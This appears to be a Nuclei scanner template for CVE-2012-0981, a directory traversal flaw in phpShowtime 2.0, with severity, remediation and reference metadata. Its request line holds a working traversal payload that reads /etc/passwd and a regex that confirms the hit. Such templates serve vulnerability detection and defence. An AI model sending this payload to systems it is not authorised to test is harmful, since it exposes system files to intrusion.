45 lines
1.5 KiB
YAML
45 lines
1.5 KiB
YAML
id: CVE-2012-0981
|
|
|
|
info:
|
|
name: phpShowtime 2.0 - Directory Traversal
|
|
author: daffainfo
|
|
severity: medium
|
|
description: A directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php.
|
|
remediation: |
|
|
Upgrade to a patched version of phpShowtime or apply the necessary security patches to fix the directory traversal vulnerability.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/18435
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2012-0981
|
|
- http://www.exploit-db.com/exploits/18435
|
|
- https://exchange.xforce.ibmcloud.com/vulnerabilities/72824
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N
|
|
cvss-score: 5
|
|
cve-id: CVE-2012-0981
|
|
cwe-id: CWE-22
|
|
epss-score: 0.02053
|
|
epss-percentile: 0.87791
|
|
cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: kybernetika
|
|
product: phpshowtime
|
|
tags: phpshowtime,edb,cve,cve2012,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 490a00463044022028aef2164f0abe64f764472150f69cd410d14c8b950edc9b87d9942e8ac49f8d0220560bb9cd6e8aa4bf3a3a302d1202fe07c58e0ede70a2874f4ea0ab976581440e:922c64590222798bb761d5b6d8e72950
|